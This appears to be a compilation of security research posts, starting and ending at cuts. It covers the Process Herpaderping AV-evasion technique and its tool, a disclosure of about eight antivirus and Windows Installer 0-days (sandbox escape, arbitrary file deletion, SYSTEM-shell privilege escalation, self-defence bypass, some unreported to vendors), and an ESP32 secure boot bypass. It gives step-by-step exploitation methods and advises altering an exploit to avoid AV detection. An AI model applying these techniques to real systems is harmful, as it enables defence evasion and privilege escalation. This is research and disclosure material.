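    remainder = len(data) % PTR_SIZE
    if remainder:
        data += b"\x00" * (PTR_SIZE - remainder)
    return data


def to_words(data: bytes) -> list:
    """Split padded bytes into the pointer-sized values a write gadget stores."""
    padded = pad_to_pointer_size(data)
    return [
        struct.unpack_from("<Q", padded, i)[0]
        for i in range(0, len(padded), PTR_SIZE)
    ]


stub = build_jmp_stub(0x4141414141414141)
print(stub.hex())
print([hex(word) for word in to_words(stub)])
```

The number of padding bytes is the pointer size minus the remainder, not the remainder itself. The two only coincide when the remainder is exactly half the pointer size, which happens to be the case for the 12-byte stub.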

A project providing all examples in this post can be found here.

With the size of the .NET framework, this of course only scratches the surface, but hopefully has given you a few ideas about how we can abuse some pretty benign looking functions to achieve unmanaged code execution in weird ways. Have fun!

Process Herpaderping

Process Herpaderping proof of concept, tool, and technical deep dive. Process Herpaderping bypasses security products by obscuring the intentions of a process.

Original text by jxy-s

Process Herpaderping is a method of obscuring the intentions of a process by modifying the content on disk after the image has been mapped. This results in curious behavior by security products and the OS itself.

https://github.com/jxy-s/herpaderping

Summary

Generally, a security product takes action on process creation by registering a callback in the Windows Kernel (PsSetCreateProcessNotifyRoutineEx). At this point, a security product may inspect the file that was used to map the executable and determine if this process should be allowed to execute. This kernel callback is invoked when the initial thread is inserted, not when the process object is created.

Because of this, an actor can create and map a process, modify the content of the file, then create the initial thread. A product that does inspection at the creation callback would see the modified content. Additionally, some products use an on-write scanning approach, which consists of monitoring for file writes. A familiar optimization here is recording that the file has been written to and deferring the actual inspection until IRP_MJ_CLEANUP occurs (e.g. the file handle is closed). Thus, an actor using a write -> map -> modify -> execute -> close workflow will subvert on-write scanning that solely relies on inspection at IRP_MJ_CLEANUP.
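
The ordering problem can be modelled without any Windows APIs. The Python sketch below is a toy, not a description of any real product: `DeferredScanner` is a hypothetical scanner that remembers writes and inspects a file only when its handle is closed, the "disk" is a dictionary, and "mapping" is simply taking a snapshot of the bytes.

```python
class DeferredScanner:
    """Toy on-write scanner that inspects a file only when its handle closes."""

    def __init__(self):
        self.dirty = set()
        self.verdicts = {}

    def on_write(self, path: str) -> None:
        # Remember that the file changed; defer the expensive scan.
        self.dirty.add(path)

    def on_cleanup(self, path: str, disk: dict) -> None:
        # Stand-in for IRP_MJ_CLEANUP: "scanning" records what is on disk now.
        if path in self.dirty:
            self.verdicts[path] = disk[path]
            self.dirty.discard(path)


def run_workflow():
    disk = {}
    scanner = DeferredScanner()
    path = "target.exe"

    disk[path] = b"payload"          # write
    scanner.on_write(path)
    mapped = disk[path]              # map: snapshot taken before the overwrite
    disk[path] = b"decoy"            # modify
    scanner.on_write(path)
    executed = mapped                # execute: runs what was mapped
    scanner.on_cleanup(path, disk)   # close: the deferred scan happens here
    return executed, scanner.verdicts[path]


executed, scanned = run_workflow()
print(executed, scanned)
```

In this model the scanner's verdict is based on the decoy bytes, while the bytes that run are the ones captured at map time.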

To abuse this convention, we first write a binary to a target file on disk. Then, we map an image of the target file and provide it to the OS to use for process creation. The OS kindly maps the original binary for us. Using the existing file handle, and before creating the initial thread, we modify the target file content to obscure or fake the file backing the image. Some time later, we create the initial thread to begin execution of the original binary. Finally, we will close the target file handle. Let’s walk through this step-by-step:

  1. Write target binary to disk, keeping the handle open. This is what will execute in memory.
  2. Map the file as an image section (NtCreateSection, SEC_IMAGE).
  3. Create the process object using the section handle (NtCreateProcessEx).
  4. Using the same target file handle, obscure the file on disk.
  5. Create the initial thread in the process (NtCreateThreadEx).
    • At this point the process creation callback in the kernel will fire. The contents on disk do not match what was mapped. Inspection of the file at this point will result in incorrect attribution.
  6. Close the handle. IRP_MJ_CLEANUP will occur here.
    • Since we’ve hidden the contents of what is executing, inspection at this point will result in incorrect attribution.
@startuml
hide empty description

[*] --> CreateFile
CreateFile --> FileHandle
FileHandle --> Write
FileHandle --> NtCreateSection
Write -[hidden]-> NtCreateSection
NtCreateSection --> SectionHandle
SectionHandle --> NtCreateProcessEx
FileHandle --> Modify
NtCreateProcessEx -[hidden]-> Modify
NtCreateProcessEx --> NtCreateThreadEx
Modify -[hidden]-> NtCreateThreadEx
NtCreateThreadEx --> [*]
FileHandle --> CloseFile
NtCreateThreadEx -[hidden]-> CloseFile
NtCreateThreadEx --> PspCallProcessNotifyRoutines
PspCallProcessNotifyRoutines -[hidden]-> [*]
CloseFile --> IRP_MJ_CLEANUP
IRP_MJ_CLEANUP -[hidden]-> [*]
PspCallProcessNotifyRoutines --> Inspect
PspCallProcessNotifyRoutines -[hidden]-> CloseFile 
IRP_MJ_CLEANUP --> Inspect
Inspect -[hidden]-> [*]

CreateFile : Create target file, keep handle open.
Write : Write source payload into target file.
Modify : Obscure the file on disk.
NtCreateSection : Create section using file handle.
NtCreateProcessEx : Image section for process is mapped and cached in file object.
NtCreateThreadEx : The cached section is used.
NtCreateThreadEx : Process notify routines fire in kernel.
Inspect : The contents on disk do not match what was executed. 
Inspect : Inspection of the file at this point will result in incorrect attribution.
@enduml
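
The attribution mismatch in the steps above can be reproduced harmlessly on an ordinary file. The following Python sketch is a simulation under loud assumptions: reading the file into memory stands in for creating the image section, no process is created, and the `simulate` helper and its arguments are hypothetical. It only shows that something inspecting the path after step 4 sees different bytes from the ones captured earlier.

```python
import hashlib
import os
import tempfile


def simulate(payload: bytes, decoy: bytes):
    """Return (hash of what was 'mapped', hash of what is on disk afterwards)."""
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "r+b") as handle:
            handle.write(payload)        # step 1: write, keep the handle open
            handle.flush()
            handle.seek(0)
            mapped = handle.read()       # steps 2-3: stand-in for the image section
            handle.seek(0)
            handle.truncate()
            handle.write(decoy)          # step 4: obscure the file via the same handle
            handle.flush()
            # Step 5 would create the initial thread here. A scanner that
            # reads the path at this point sees only the decoy.
            with open(path, "rb") as scanner_view:
                on_disk = scanner_view.read()
        # step 6: the handle is closed when the with-block exits
    finally:
        os.remove(path)
    return hashlib.sha256(mapped).hexdigest(), hashlib.sha256(on_disk).hexdigest()


mapped_hash, disk_hash = simulate(b"original image bytes", b"decoy bytes")
print(mapped_hash != disk_hash)
```

A detection built on hashing the file at callback time or at handle close would record `disk_hash`, which says nothing about the content that was mapped.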

Behavior

You’ll see in the demo below, CMD.exe is used as the execution target. The first run overwrites the bytes on disk with a pattern. The second run overwrites CMD.exe with ProcessHacker.exe. The Herpaderping tool fixes up the binary to look as close to ProcessHacker.exe as possible, even retaining the original signature. Note the multiple executions of the same binary and how the process looks to the user compared to what is in the file on disk.

Diving Deeper

We’ve observed the behavior and some of this may be surprising. Let’s try to explain this behavior.

Technical Deep Dive

Background and Motivation

When designing products for securing Windows platforms, many engineers in this field (myself included) have fallen on preconceived notions with respect to how the OS will handle data. In this scenario, some might expect the file on disk to remain "locked" when the process is created. You can’t delete the file. You can’t write to it. But you can rename it. Seen here, under the right conditions, you can in fact write to it. Remain vigilant on your assumptions, always question them, and do your research.

The motivation for this research came about when discovering how to do analysis when a file is written. With prior background researching process Hollowing and Doppelganging, I had theorized this might be possible. The goal is to provide better security. You cannot create a better lock without first understanding how to break the old one.

Similar Techniques

Herpaderping is similar to Hollowing and Doppelganging; however, there are some key differences:

Process Hollowing

Process Hollowing involves modifying the mapped section before execution begins, which abstractly looks like: map -> modify section -> execute. This workflow results in the intended execution flow of the Hollowed process diverging into unintended code. Doppelganging might be considered a form of Hollowing. However, Hollowing, in my opinion, is closer to injection in that Hollowing usually involves an explicit write to the already mapped code. This differs from Herpaderping where there are no modified sections.

Process Doppelganging

Process Doppelganging is closer to Herpaderping. Doppelganging abuses transacted file operations and generally involves these steps: transact -> write -> map -> rollback -> execute. In this workflow, the OS will create the image section and account for transactions, so the cached image section ends up being what you wrote to the transaction. The OS has patched this technique. Well, they patched the crash it caused. Maybe they consider this a "legal" use of a transaction. Thankfully, Windows Defender does catch the Doppelganging technique. Doppelganging differs from Herpaderping in that Herpaderping does not rely on transacted file operations. And Defender doesn’t catch Herpaderping.

Comparison

For reference, the generalized techniques:

Type          | Technique
------------- | -----------------------------------------------
Hollowing     | map -> modify section -> execute
Doppelganging | transact -> write -> map -> rollback -> execute
Herpaderping  | write -> map -> modify -> execute -> close

We can see the differences laid out here. While Herpaderping is arguably noisier than Doppelganging, in that the malicious bits do hit the disk, we’ve seen that security products are still incapable of detecting Herpaderping.

Possible Solution

There is not a clear fix here. It seems reasonable that preventing an image section from being mapped/cached when there is write access to the file should close the hole. However, that may or may not be a practical solution.

Another option might be to flush the changes to the file through to the cached image section if it hasn’t yet been mapped into a process. However, since the map into the new process occurs at NtCreateProcess that is probably not a viable solution.

From a detection standpoint, there is not a great way to identify the actual bits that got mapped. Inspection at IRP_MJ_CLEANUP, or in a callback registered with PsSetCreateProcessNotifyRoutineEx, results in incorrect attribution since the bits on disk have been changed; you would have to rebuild the file from the section that got created. It’s worth pointing out that there is a new callback in Windows 10 you may register for, PsSetCreateProcessNotifyRoutineEx2. However, this suffers from the same problem as the previous callback: it’s called out when the initial thread is executed, not when the process object is created. Microsoft did add PsSetCreateThreadNotifyRoutineEx, which is called out when the initial thread is inserted if registered with PsCreateThreadNotifyNonSystem, as opposed to when it is about to begin execution (as the old callback did). Extending PSCREATEPROCESSNOTIFYTYPE to be called out when the process object is created won’t help either: we’ve seen in the Diving Deeper section that the image section object is cached on the NtCreateSection call, not NtCreateProcess.

We can’t easily identify what got executed. We’re left with trying to detect the exploitive behavior by the actor. I’ll leave discovery of the behavior indicators as an exercise for the reader.

Known Affected Platforms

Below is a list of products and Windows OSes that have been tested as of (8/31/2020). Tests were carried out with a known malicious binary.

Operating System                   | Version         | Vulnerable
---------------------------------- | --------------- | ----------
Windows 7 Enterprise x86           | 6.1.7601        | Yes
Windows 10 Pro x64                 | 10.0.18363.900  | Yes
Windows 10 Pro Insider Preview x64 | 10.0.20170.1000 | Yes
Windows 10 Pro Insider Preview x64 | 10.0.20201.1000 | Yes

Security Product                   | Version      | Vulnerable
---------------------------------- | ------------ | ----------
Windows Defender AntiMalware Client | 4.18.2006.10 | Yes
Windows Defender Engine            | 1.1.17200.2  | Yes
Windows Defender Antivirus         | 1.319.1127.0 | Yes
Windows Defender Antispyware       | 1.319.1127.0 | Yes
Windows Defender AntiMalware Client | 4.18.2007.6  | Yes
Windows Defender Engine            | 1.1.17300.2  | Yes
Windows Defender Antivirus         | 1.319.1676.0 | Yes
Windows Defender Antispyware       | 1.319.1676.0 | Yes
Windows Defender AntiMalware Client | 4.18.2007.8  | Yes
Windows Defender Engine            | 1.1.17400.5  | Yes
Windows Defender Antivirus         | 1.323.267.0  | Yes
Windows Defender Antispyware       | 1.323.267.0  | Yes

Responsible Disclosure

This vulnerability was disclosed to the Microsoft Security Response Center (MSRC) on 7/17/2020 and a case was opened by MSRC on 7/22/2020. MSRC concluded their investigation on 8/25/2020 and determined the findings are valid but do not meet their bar for immediate servicing. At this time their case is closed, without resolution, and is marked for future review, with no timeline.

We disagree on the severity of this bug; this was communicated to MSRC on 8/27/2020.

  1. There are similar vulnerabilities in this class (Hollowing and Doppelganging).
  2. The vulnerability is shown to defeat security features inherent to the OS (Windows Defender).
  3. The vulnerability allows an actor to gain execution of arbitrary code.
  4. The user is not notified of the execution of unintended code.
  5. The process information presented to the user does not accurately reflect what is executing.
  6. Facilities to accurately identify the process are not intuitive or incorrect, even from the kernel.

Source

This repo contains a tool for exercising the Herpaderping method of process obfuscation. Usage is as follows:

Process Herpaderping Tool - Copyright (c) Johnny Shaw
ProcessHerpaderping.exe SourceFile TargetFile [ReplacedWith] [Options...]
Usage:
  SourceFile               Source file to execute.
  TargetFile               Target file to execute the source from.
  ReplacedWith             File to replace the target with. Optional,
                           default overwrites the binary with a pattern.
  -h,--help                Prints tool usage.
  -d,--do-not-wait         Does not wait for spawned process to exit,
                           default waits.
  -l,--logging-mask number Specifies the logging mask, defaults to full
                           logging.
                               0x1   Successes
                               0x2   Informational
                               0x4   Warnings
                               0x8   Errors
                               0x10  Contextual
  -q,--quiet               Runs quietly, overrides logging mask, no title.
  -r,--random-obfuscation  Uses random bytes rather than a pattern for
                           file obfuscation.
  -e,--exclusive           Target file is created with exclusive access and
                           the handle is held open as long as possible.
                           Without this option the handle has full share
                           access and is closed as soon as possible.
  -u,--do-not-flush-file   Does not flush file after overwrite.
  -c,--close-file-early    Closes file before thread creation (before the
                           process notify callback fires in the kernel).
                           Not valid with "--exclusive" option.
  -k,--kill                Terminates the spawned process regardless of
                           success or failure, this is useful in some
                           automation environments. Forces "--do-not-wait"
                           option.
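
The logging mask is a plain bit field, so values combine with bitwise OR. The Python sketch below decodes a mask using the bit values from the usage text. Whether the tool itself accepts hexadecimal input on the command line is an assumption here, and `LogMask` and `parse_mask` are hypothetical names used only for this illustration.

```python
from enum import IntFlag


class LogMask(IntFlag):
    """Bit values as listed in the tool's usage output."""
    SUCCESSES = 0x1
    INFORMATIONAL = 0x2
    WARNINGS = 0x4
    ERRORS = 0x8
    CONTEXTUAL = 0x10


def parse_mask(text: str) -> LogMask:
    """Parse a decimal or 0x-prefixed mask string into flags."""
    return LogMask(int(text, 0))


mask = parse_mask("0xC")
print(LogMask.WARNINGS in mask, LogMask.ERRORS in mask, LogMask.SUCCESSES in mask)
```

A mask of 0xC therefore selects warnings and errors only, and 0x1F selects all five categories.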

Cloning and Building

The repo uses submodules; after cloning, be sure to init and update the submodules. Project files are targeted to Visual Studio 2019.

git clone https://github.com/jxy-s/herpaderping.git
cd .\herpaderping\
git submodule update --init --recursive
MSBuild .\herpaderping.sln

Credits

The following are used without modification. Credits to their authors.

  • Windows Implementation Libraries (WIL)
    A header-only C++ library created to make life easier for developers on Windows through readable type-safe C++ interfaces for common Windows coding patterns.
  • Process Hacker Native API Headers
    Collection of Native API header files. Gathered from Microsoft header files and symbol files, as well as a lot of reverse engineering and guessing.

Oh, so you have an antivirus… name every bug

Original text by halove23

After my previous disclosures covering Windows Defender and Windows Setup, this is the next one.

First of all, why? Because I can, and because I need a job.

In this blog I will be disclosing about 8 0-day vulnerabilities, all of them still unknown to the vendors. Don’t expect these bugs to keep working for more than a week or two, because the vendors will probably release emergency security patches to fix them.

    Avast antivirus

a.   Sandbox Escape

Avast antivirus (any paid version) has a feature called Avast Sandbox, which lets you test a suspicious file in a sandbox. This sandbox is completely different from any sandbox I know. Windows sandboxed apps run in a special container with mitigations applied to their tokens (such as lowering the token integrity or applying the create-process mitigation), and other sandboxes run a suspicious file in a virtual machine so that it stays completely isolated. With Avast Sandbox, the sandboxed app runs in the OS itself with only a few mitigations applied to its token, such as removing privileges like SeDebugPrivilege and SeShutdownPrivilege, while the token integrity stays the same. That alone isn’t enough to make a sandbox, so Avast also creates a virtualized file stream and registry hive almost identical to the real ones, and forces the sandboxed app to use them by hooking every single WINAPI call! This sounds cool but also sounds impossible: any incomplete hooking could result in a sandbox escape.

Btw, the virtualized file stream is located in “C:\avast! sandbox”

The virtualized registry hive exists in “H****\__avast! Sandbox”, and it looks like there’s also a virtualized object manager in “\snx-av\”.

Normally, before attempting any escape, I read whatever write-ups are available on Avast sandbox escapes, and after some research it looks like I found something: CVE-2016-4025 and another bug by Google Project Zero.

Nettitude Labs covered a crafted DeviceIoControl call used to escape from the virtualization. They noticed that after using the “Save As” feature in Notepad, the saved file ends up outside the sandbox (in the real filesystem), and that looked like my way out.

I tried their approach by clicking on “Save As”, and it doesn’t seem to work because the patch has disabled the feature. So instead of clicking on “Save As”, I clicked on “Print”.

Doing that brought up another pop-up, so I clicked Print with the default printer, “Microsoft XPS Document Writer”.

And yup, we get a “Save As” window after clicking on Print.

So I clicked on Save. I really didn’t expect anything to happen, but guess what:

The file was spawned outside the virtualized file stream. That’s clearly a sandbox escape.

How? It looks like an external process wrote the file while impersonating Notepad’s access token. Luckily, since CVE-2020-1337 I had been focused on learning the Printer API by reading every piece of documentation provided by Microsoft. Meanwhile, James Forshaw published something related to a Windows sandbox escape using the Printer API here.

So I assume we can easily escape from the sandbox if we manage to call the Printer API correctly. We will begin with the OpenPrinter function.

And of course we will specify in pPrinterName the default printer that exists on a standard Windows installation, “Microsoft XPS Document Writer”.

Next we will go for the StartDocPrinter function, which allows us to prepare a document for printing, and the third argument looks kind of important.

So we will take a look at the DOC_INFO_1 struct, and there’s some good news.

It looks like the second member will allow us to specify the actual file name, so it’s probably our way out of the Avast sandbox.

So what now? We can probably get the file created outside the sandbox, but what about writing to it? After further research I found another function that works like WriteFile: WritePrinter.

Then the final result will look like this:

Note: The bug was reported to the vendor, but as usual they didn’t reply.

b.   Privilege Escalation

It was a bit hard to find a privilege escalation, but after taking some time, here you go, Avast. There’s a feature in Avast called “REPAIR APP”. After clicking on it, it looks like the Avast Antivirus Engine creates a new child process called “Instup.exe”.

There’s probably something worth looking at there, so we attempt to repair the app while watching with a tool called Process Monitor.

And as usual we got something worth our attention: the instup process looks for some non-existent directories, C:\stage0 and c:\stage1.

So what if they exist?

I created the c:\stage0 directory with a file inside it and looked at how instup.exe behaves against it. I observed an unexpected behaviour: instead of just deleting or ignoring the file, it actually creates a hardlink to it.

We could exploit this, but the problem is that the hardlink has a random name. If we could guess the name at the moment the hardlink is created, we could redirect the creation to an arbitrary location, but unluckily the random name is incredibly hard to guess. Who knows how much time that would take, so I preferred to start looking somewhere else.

At the end of the hardlink creation process, you can see that both files have been marked for deletion, so we can probably abuse this to achieve an arbitrary file deletion bug.

I’ve created an exploit for the issue. The exploit creates a file inside c:\stage0 and continuously looks for the hardlink. When the hardlink is created, the PoC places an OpLock on it until instup attempts to delete it. The PoC then moves the file away and turns c:\stage0 into a junction to “\RPC CONTROL\”, where we create a symbolic link to redirect the file deletion to an arbitrary file.

Note: This bug wasn’t reported to the vendor.

PoC can be found here

McAfee Total Security

a.   Privilege Escalation

I already found bugs in this AV before and was acknowledged by the vendor for CVE-2020-7279 and CVE-2020-7282.

CVE-2020-7282 was for an arbitrary file deletion issue in McAfee Total Protection and CVE-2020-7279 was for a self-defence bypass.

McAfee Total Security was vulnerable to an arbitrary file deletion: creating a junction from C:\ProgramData\McAfee\Update to an arbitrary location resulted in arbitrary file deletion. The security patch changed how the McAfee Total Security updater handles reparse points.

More importantly, C:\ProgramData\McAfee\Update is protected by the self-defence driver, so even an administrator couldn’t create files in this directory. The bypass was done by opening the directory for GENERIC_WRITE access and then creating a mount point to the target directory, so that as soon as the updater started it would delete the target directory’s contents.

But now a lot has changed: the directory now has contents (previously it was empty by default).

I did some analysis on how they fixed the self-defence bug. Instead of preventing the directory from being opened with GENERIC_WRITE (as was expected), they blocked the control codes FSCTL_SET_REPARSE_POINT and FSCTL_SET_REPARSE_POINT_EX from being called on a protected filesystem component. I expected FSCTL_SET_REPARSE_POINT_EX to be overlooked, but no, they made a smart move here. So unless we bypass the self-defence, we have no actual impact on the component.

So this is it, this is as far as I can go… or not?

b.   Novel way to bypass the self defence

This method works for all antiviruses that use a filesystem filter.

So how does the kernel filter work?

The filesystem filter restricts access to the antivirus-owned objects by intercepting user-mode file I/O requests: if the request comes from an antivirus component it is granted; if not, access denied is returned.

You can read more about that here. I have already written some such filters, but for private use, so for the moment I can’t disclose them. There are plenty of examples you can find, for example: here

So as far as I know there are 2 ways to bypass the filter

1.     Make a special call so that what actually happens conflicts with what the driver sees

2.     Request access from a protected component

The special call was patched in CVE-2020-7279, so the option that remains is the second one. How can we do that?

The majority of AV GUIs offer a file dialog to select something. Take, for example, the McAfee file shredder, which opens a file dialog to let you pick something

While the file dialog is meant for picking files, it can be weaponized against the AV. To better understand this we need some example code, so I looked for the API provided by Microsoft to do that. Generally, apps use either GetOpenFileNameW or the IFileDialog interface, and since GetOpenFileNameW seems to be a bit deprecated, we will focus on the IFileDialog interface.

So I created some sample code (it looks horrible but still does the job)

After running the code

It looks like the job is being done from within the process, not from an external process (such as explorer), so technically anything we do is considered to be done by the process.

Hold on, if things are done by the process, doesn’t that mean that we can create a folder in a protected location? Yes, we can

c.   Weaponizing the self-protection bypass

The CVE-2020-7282 patch was a simple check for reparse points before attempting to delete any directory.

The check is simple: if the FSCTL_GET_REPARSE_POINT control code on a directory returns anything except STATUS_NOT_A_REPARSE_POINT, the target will be removed; otherwise the updater will delete the subcontent as “NT AUTHORITY\SYSTEM”.

Chaining it together, I have an exploit which demonstrates the bug. First, a directory in C:\updmgr is created, and then you should manually move it to C:\ProgramData\McAfee\Update. An opportunistic lock triggers the PoC as soon as the AV GUI attempts to move the folder. The PoC then turns the directory into a reparse point to the target and locks the moved directory, which prevents the reparse point from being deleted.

PoC can be found here

Avira Antivirus

I’m gonna do the tests on Avira Prime. Not gonna lie, Avira has the easiest way to download their antivirus; other vendors crack your head before they give you the trial. I really feel bad for disclosing this bug

Anyway, it looks like there’s a feature that comes with Avira Prime called Avira System Speedup Pro. I still can’t explain why this behaviour exists in the Avira System Speedup feature, but yeah, it exists.

When starting the Avira System Speedup Pro GUI, an initialization is done by the service “Avira.SystemSpeedup.Service.exe”, which is written in C#. That makes the service easier to reverse, but I reversed it and things just didn’t make any sense, so I guess it’s better to show Process Monitor output to understand the issue.

When opening the GUI, I assume that there’s RPC communication between the GUI and the service to perform the initialization required to serve the user’s needs. When the service begins the initialization process, it creates and removes a directory in C:\Windows\Temp\Avira.SystemSpeedup.Service.madExcept without even checking for a reparse point. It’s extremely easy to abuse the issue.

This time, instead of writing a C++ PoC, I’ll write a simpler one as a batch script. The PoC in this case doesn’t need any user interaction and will delete the targeted directory’s subcontent.

PoC can be found here

Trend Micro Maximum Security

One of the best AVs I’ve ever seen, but unluckily this disclosure adds this antivirus to the blacklist.

I already discovered an issue in Trend Micro, which was patched as CVE-2020-25775, and I literally just found a high-severity issue in Trend Micro. But I was contracted for it, so I can’t disclose it here.

Moving on: as with other AVs, there’s a PC Health Checkup feature, and it’s probably worth our attention.

While browsing through the component, I noticed a “Clean Privacy Data” feature.

I clicked on MS Edge and cleaned, the output from process monitor was:

And as you can see, the Trend Micro Platinum Host Service is deleting a directory in a user-writable location without a proper check for reparse points while running as “NT AUTHORITY\SYSTEM”, which a user can easily abuse to delete arbitrary files.
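To make the missing "proper check against reparse point" concrete, here is a minimal Python sketch of what such a check could look like before a privileged cleanup. It is not the vendor's code. The helper names `is_reparse_point` and `safe_clean` are hypothetical, and the symlink fallback is only there so the sketch also behaves sensibly on non-Windows systems.

```python
import os
import stat

# Value of the Windows FILE_ATTRIBUTE_REPARSE_POINT flag.
FILE_ATTRIBUTE_REPARSE_POINT = 0x400


def is_reparse_point(path):
    """Return True if path itself (not its target) is a link-like object."""
    st = os.lstat(path)  # lstat inspects the link, not what it points to
    attrs = getattr(st, "st_file_attributes", 0)  # only populated on Windows
    if attrs & FILE_ATTRIBUTE_REPARSE_POINT:
        return True
    return stat.S_ISLNK(st.st_mode)  # symlink fallback for other platforms


def safe_clean(directory):
    """Hypothetical cleanup helper that refuses to follow redirected paths."""
    if is_reparse_point(directory):
        raise PermissionError(f"refusing to clean redirected path: {directory}")
    removed = []
    for name in os.listdir(directory):
        entry = os.path.join(directory, name)
        if is_reparse_point(entry) or os.path.isdir(entry):
            continue  # sketch only: skip links and nested directories
        os.remove(entry)
        removed.append(name)
    return removed
```

Note that a check followed by a delete is still racy on its own (the directory can be swapped between the two steps), which is exactly the kind of window the OpLock-based PoCs in this post rely on. A robust fix would also need to impersonate the user or operate on an already opened handle.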

There’s nothing more to say. I created a proof of concept as a batch script; after running it, expect the target directory’s subcontent to be deleted.

PoC can be found here

MalwareBytes

Yup, another good AV. I’ve already engaged with this antivirus, and as usual I got a bug. 5 months have passed since I reported the bug and they still haven’t patched the issue, and since they paid the bounty, I can’t disclose it. But as usual, PAPA has candies for you!

I will be using the same technique explained above to bypass the self-protection.

While checking for updates, the antivirus looks for a non-existent directory

Hmmmm, let’s take a look

The picture above shows that the Malwarebytes antivirus engine is deleting every subcontent of C:\ProgramData\Malwarebytes\MBAMService\ctlrupdate\test.txt.txt. Since there’s no impersonation of the user and literally no proper check for reparse points, we can probably abuse that: by creating a directory there and creating a reparse point inside C:\ProgramData\Malwarebytes\MBAMService\ctlrupdate, we can redirect the file deletion to an arbitrary location.

The PoC can be found here

Kaspersky

The AV I have engaged with the most: about 11 bugs were reported and 3 of them were fixed.

For the moment I will be talking about a bug which I already disclosed here. This PoC spawns a SYSTEM shell as soon as it succeeds. The bug still seems to exist in Kaspersky Total Security with the latest December 2020 security patches. The only issue you will have is that the AV detects the exploit as malware, so you must make some modifications to prevent your exploit from being deleted. I can confirm that the issue still exists.

One more thing

Another issue I discovered affects all of Kaspersky’s antiviruses and allows arbitrary file overwrite without user interaction. I’ve already reported the bug to Kaspersky, but they didn’t give me a bug bounty

They said that the issue isn’t eligible for a bug bounty because reproduction of the issue is unstable. Ain’t gonna lie, I gave them a horrible proof of concept, but it still does the job, so I guess it should be rewarded, since they wrote that they give bounties. I won’t give bugs away for free like a fool.

So let’s dive into the bug: when any user starts Mozilla Firefox, Kaspersky writes a special file in %Firefox_Dir%\defaults\pref without impersonating the user or even doing proper link checks. If abused correctly, this can be used against the AV to trigger arbitrary file overwrite on demand without user interaction.

A proof of concept implementing the issue is attached. I’ve written a new one which will trigger it on demand, thank me later.

PoC can be found here

Windows

 I was about to disclose bugs in Eset and Bitdefender but I don’t have time to write more, so here’s the last one.

First, if you’re not familiar with Windows Installer CVE-2020-16902: it’s literally the 6th time I am bypassing the security patch, and they still don’t hire security researchers. I will be using the same package as for CVE-2020-16902

Microsoft patched the issues by checking whether c:\config.msi exists: if not, it will be used to generate the rollback directory; otherwise, if it exists, c:\windows\installer\config.msi will be used as the folder for rollback files.

A tweet by sandboxescaper mentioned that if the registry key “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi” exists when the installation begins, the Windows installer will use c:\config.msi as the directory for rollback files. As an unprivileged user, I guess there’s no way to prevent the deletion of, or to create, “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi”

And as usual there’s always something that’s worth our attention.

When the directory is deleted, there’s an additional check whether the directory exists or not, which is kinda strange, since RemoveDirectory returned TRUE

I guess there’s no need to make additional checks. I was pretty sure that there was a bug there, so I managed to create the directory as soon as the installer deleted it, and this happened

The installer checked whether the directory exists, and the check reported that it does, so the Windows installer won’t delete the registry key “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi” because the directory wasn’t deleted.

In the next installation, C:\Config.Msi will be used to save rollback files, which can be easily abused (I’ve already done that in CVE-2020-1302 and CVE-2020-16902).

I’ve provided a PoC as a C++ project to exploit the issue. It’s a double click to a SYSTEM shell, thank me later again.

PoC can be found here

Note: I am not responsible for any usage of these disclosures, you’re on your own.

Espressif ESP32: Bypassing Encrypted Secure Boot (CVE-2020-13629)

Original text by Raelize

We arrived at the last post about our Fault Injection research on the ESP32. Please read our previous posts, as they provide context for the results described in this post.

During our Fault Injection research on the ESP32, we gradually took steps forward in order to identify the required vulnerabilities that allowed us to bypass Secure Boot and Flash Encryption with a single EM glitch. Moreover, we did not only achieve code execution, we also extracted the plain-text flash data from the chip.

Espressif requested a CVE for the attack described in this post: CVE-2020-13629. Please note, that the attack as described in this post, is only applicable to ESP32 silicon revision 0 and 1. The newer ESP32 V3 silicon supports functionality to disable the UART bootloader that we leveraged for the attack.

UART bootloader

The ESP32 implements a UART bootloader in its ROM code. This feature allows, among other functionality, programming the external flash. It’s not uncommon for such functionality to be implemented in the ROM code, as this is quite robust: the code cannot easily get corrupted. If this functionality were implemented by code stored in the external flash, any corruption of the flash could result in a bricked device.

Typically, this type of functionality is accessed by booting the chip in a special boot mode. The boot mode selection is often done using one or more external strap pin(s) which are set before resetting the chip. On the ESP32 it works exactly like this, using pin G0, which is exposed externally.

The UART bootloader supports many interesting commands that can be used to read/write memory, read/write registers and even execute a stub from SRAM.

Executing arbitrary code

The UART bootloader supports loading and executing arbitrary code using the load_ram command. The ESP32’s SDK includes all the tooling required to compile the code that can be executed from SRAM. For example, the following code snippet will print SRAM CODE\n on the serial interface.

void __attribute__((noreturn)) call_start_cpu0()
{
    ets_printf("SRAM CODE\n");
    while (1);
}

The esptool.py tool, which is part of the ESP32’s SDK, can be used to load the compiled binary into the SRAM after which it will be executed.

esptool.py --chip esp32 --no-stub --port COM3 load_ram code.bin

Interestingly, the UART bootloader cannot be disabled and is therefore always accessible, even when Secure Boot and Flash Encryption are enabled.

Additional measures

Obviously, if no additional security measures were taken, leaving the UART bootloader always accessible would likely render Secure Boot and Flash Encryption useless. Therefore, Espressif implemented additional security measures which are enabled using dedicated eFuses.

These are security configuration bits implemented in special memory, often referred to as OTP memory, which can typically only change from 0 to 1. This guarantees that a bit, once set, stays set forever. The following OTP memory bits are used to disable specific functionality when the ESP32 is in the UART bootloader boot mode.

  • DISABLE_DL_ENCRYPT: disables flash encryption operation
  • DISABLE_DL_DECRYPT: disables transparent flash decryption
  • DISABLE_DL_CACHE: disables the entire MMU flash cache

The most relevant OTP memory bit is DISABLE_DL_DECRYPT as it disables the transparent decryption of the flash data.

If not set, it would be possible to simply access the plain-text flash data while the ESP32 is in its UART bootloader boot mode.

If set, any access to the flash, when the chip is in UART bootloader boot mode, will yield just the encrypted data. The Flash Encryption feature, which is fully implemented in hardware and transparent to the processor, is only enabled when the ESP32 is in Normal boot mode.

The attacks described in this post have all these bits set to 1.
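The one-way nature of these bits can be illustrated with a toy model. This is only a sketch of the "0 to 1 only" property described above. The class `OtpWord` is hypothetical and the bit positions are made up for illustration; they are not the real ESP32 eFuse layout.

```python
# Bit positions below are illustrative only, not the real ESP32 eFuse layout.
DISABLE_DL_ENCRYPT = 1 << 0
DISABLE_DL_DECRYPT = 1 << 1
DISABLE_DL_CACHE = 1 << 2


class OtpWord:
    """Toy model of one-time-programmable bits: they can only go 0 -> 1."""

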